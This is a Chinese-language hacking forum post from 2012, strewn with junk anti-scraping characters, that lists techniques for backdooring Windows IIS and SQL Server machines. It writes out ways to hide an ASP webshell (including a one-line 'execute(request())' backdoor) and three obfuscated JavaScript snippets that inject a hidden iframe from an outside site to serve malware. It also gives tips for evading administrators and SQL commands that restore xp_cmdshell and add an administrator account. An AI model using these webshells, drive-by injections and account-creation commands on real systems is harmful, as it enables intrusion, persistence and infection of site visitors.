$ D# }9 E F# F$ f# ^/ F- o/ b拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 g9 C% O; M R) |8 L9 P! Z) P
通过web访问ASP木马:http://ip/images../news.asp?action=login! H1 g) ]* e6 y/ B; i
如何删除非标准目录:rmdir images..\ /s
2 l+ C' a1 k" `4 Z8 }; c- v2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
' @; O( m$ i& P; Q1 Kmkdir programme.asp
, K: E* N4 Z$ S6 m# j6 e新建1.txt文件内容:<!--#include file=”12.jpg”-->! J5 y# e7 h2 z) | P
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
! m$ h( |+ U$ c9 aattrib +H +S programme.asp
/ _% o5 ?4 j6 g. G2 C+ j# {6 ]通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! @$ z( Z9 \9 s6 w
- @' U: L2 h- r$ t3 o, }1 p& f6 S( X- Z54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
' y" d# F2 |. |' n; q1 e然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
) K u( @; T. f
9 n* }7 {2 H0 c5 h7 A55、JS隐蔽挂马& s. N& N, U4 S5 p) D. F6 H
1.
* a$ @7 e8 |3 m- Ovar tr4c3="<iframe src=ht";) l% d! ~; W+ r* ~( ~& |
tr4c3 = tr4c3+"tp:/";
' A3 [9 K. Q; Ztr4c3 = tr4c3+"/ww";# _, l5 w# ^+ \$ w( i& Z
tr4c3 = tr4c3+"w.tr4";
: V1 Q9 N, J0 w8 Ftr4c3 = tr4c3+"c3.com/inc/m";! R$ y$ `) V; d: o
tr4c3 = tr4c3+"m.htm style="display:none"></i";
# C a! K, A2 a3 m4 E; Str4c3 =tr4c3+"frame>'";
4 b' L E7 i4 I m. R0 i" {9 [document.write(tr4c3);
C9 w' @( T& o, _5 K6 f避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 ^! ]5 S5 s* G7 C- l5 n* |8 }1 u9 c5 @
2.
# r6 r/ B" r1 p/ V0 g p) a3 T转换进制,然后用EVAL执行。如
O" C3 W- M. ^+ T1 z; Geval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 s; }# j' y9 X- B5 W4 `
不过这个有点显眼。# U' S+ i8 y7 w! P- {: R
3.
$ h# O+ P. p% z) `; n5 R4 U" fdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
# N0 p' M, V/ D( \8 R6 ?; w+ o6 p$ _; }7 e最后一点,别忘了把文件的时间也修改下。
: h# Q( o0 `$ s; v, _6 [ X& \. {$ S% a
56.3389终端入侵常用DOS命令! X+ s& f H: r
taskkill taskkill /PID 1248 /t" }+ q# G ~( B7 X2 r
; o/ ]- \9 f; {/ J. l$ [3 T
tasklist 查进程
$ x+ E! |7 J0 ~9 i( i& V2 K
+ M7 r" j, G: u0 u+ Wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
5 g2 T3 A: t/ d8 J1 Wiisreset /reboot1 g/ C: ~" [' B) I
tsshutdn /reboot /delay:1 重起服务器
1 G7 T8 S$ L" }! G+ J4 Z+ g# w- _ |: b/ ^' K+ J7 y
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,3 v6 O+ k# y4 @5 k1 F) p
/ n3 A" l/ T8 `! `9 O& Squery user 查看当前终端用户在线情况
* X% n; y- N+ Z( i( l- h
4 U# p/ L/ ]9 @- n1 b g' M6 ~& M要显示有关所有会话使用的进程的信息,请键入:query process *" y2 k B% w3 ]$ g! c! N' w1 Y; B
! z( T- l. M$ D% a3 `% c: ^要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
; y, r G0 ?/ x1 c, v3 p2 v- O
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2) w: q4 V7 D) n/ f3 c
8 H2 o1 E$ V; k& P% D: c; v3 q要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
% W6 S) f6 H, S1 }+ I! Y7 M; I9 E: A: Q3 ] K8 @ R
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
# O8 t4 y, `8 y6 @0 Q7 ?8 b7 U! X( n" Y8 w0 d+ a) a4 S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
V7 u" k! _* H. f# ]$ W) e3 l% g1 @; K6 u/ B) n7 R
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
6 z( Z1 p. t7 B" s* e0 K, \0 q. Y2 }# t5 y) ^) u
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
: ~! H" X, o4 v" L! h' ^, P- V1 e3 G. v6 k: N3 O
56、在地址栏或按Ctrl+O,输入:
" k0 z+ R) _: ]javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;) K9 r, Y& a% k
8 [$ D0 L4 s+ @4 s9 K源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。7 n/ A0 r0 ^$ s7 }, H" m! s8 c
4 H) v$ ~' x! t1 ?6 S! u& X9 Y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
9 x/ G$ E' p7 ]: Z! r: }用net localgroup administrators是可以看到管理组下,加了$的用户的。7 E# c( p; r2 J0 W, L' A$ G2 o( D
( P6 f& Z' D9 n1 ?' V58、 sa弱口令相关命令, j3 {0 A! s* s
; Y8 R; H& ~% m* a1 q一.更改sa口令方法:
6 J% {: h7 R R: j2 {) ^9 C用sql综合利用工具连接后,执行命令:
7 R8 ]. P. A# ]/ _. Hexec sp_password NULL,'20001001','sa'
# O5 Q% [9 T' S( W9 a(提示:慎用!)6 d: N F) p( C$ ~3 y
4 E8 R- n8 k1 L9 [# l* G
二.简单修补sa弱口令.( \8 n$ L3 {7 o4 d7 w. l
. ^0 G q- [1 M. D. B+ L! O) S
方法1:查询分离器连接后执行:7 a q$ K4 w/ W3 @' l; e3 |
if exists (select * from
* H3 |% t7 x' d. s* s; R( D2 \dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
% y( V7 B/ }+ ]' q. P' ^1 cOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
& \3 q3 p1 ]. _0 ~& G) l0 g+ K( q& k5 g/ _% W
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
. n' U8 M4 o& A) x8 C& \2 R$ \( C; L! |: _6 R) L& P
GO! h- x5 y5 b! t& |3 y& k/ J
$ j8 o* H* \* @, Y9 g- u然后按F5键命令执行完毕
. K& R1 Z/ `' ^: n/ V+ l L; w6 V$ h+ I2 F2 B5 _1 v8 Q
方法2:查询分离器连接后. D- i6 X. M3 T) U) k, Y0 l. f
第一步执行:use master4 a' I5 z- @- R2 W. c+ z0 }
第二步执行:sp_dropextendedproc 'xp_cmdshell'0 p4 K3 K7 t" N4 ~4 E) {
然后按F5键命令执行完毕
; t* T) E" O* t8 c& t5 I1 ]5 z0 v( x7 T: Q: t; [
. ^0 P" R. ?3 i- j F0 S% ]" e
三.常见情况恢复执行xp_cmdshell.
. r+ L& o/ ]" f5 Q9 C1 ^$ g7 z0 n7 u/ v9 M+ R0 O5 S
5 G) s1 k" G& ~* K
1 未能找到存储过程'master..xpcmdshell'.
7 \2 } R! M8 a1 h/ L3 ^1 @ 恢复方法:查询分离器连接后,) M( i. w4 c* p9 c3 _6 p0 S- w
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
, y+ l, ^$ n' c& W U第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' b* y* M# H7 c+ L' b. i+ r
然后按F5键命令执行完毕
. ]$ @% c/ A+ d! v {8 l( s7 }8 } Y; d) x4 j, |+ \+ u V) e
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)9 A6 J; c# ~% X! u
恢复方法:查询分离器连接后,; H. C0 F7 H: ?9 v3 U; q1 N8 \
第一步执行:sp_dropextendedproc "xp_cmdshell"
: o$ q' C+ u i第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 y! i* A4 l( N" p" q然后按F5键命令执行完毕 H W/ Z: C& Y/ w- f
7 W4 J4 i/ S8 `+ {) k7 i7 P3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)+ T1 U8 n2 ~" X% Y6 W
恢复方法:查询分离器连接后,
" p9 @* \( Y' S( H第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
1 d: {1 n* ?0 g' e. z5 Z第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ( u0 k9 j, g: m5 F6 [: e( s- n/ c
然后按F5键命令执行完毕$ l) ~5 j# b# K
# B* M; p. `# ]# j% _
四.终极方法.
# ]8 ~8 i& z7 a+ m如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
- n! S5 }; E \9 V5 e查询分离器连接后,
0 A' p0 J1 @+ g% V# T2000servser系统:& C% x$ Z) Q$ }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'8 s3 c$ g# p, r1 W
$ Z0 l* k3 n* x8 P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# B6 O+ X8 j3 Z/ l
$ {( c0 V+ \( y0 P: z. gxp或2003server系统:
; `( J- f% b# c/ R; r% r' ]$ O
( @( o5 T0 m; Y8 b: l, w/ q) tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
) V. O3 f* L; i; ] ?$ ]" [ i
# x- Y% A* k/ N5 }4 d4 {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- q1 d3 e% R) K p6 j |
发表于 2012-9-15 14:51:03
收藏
支持
反对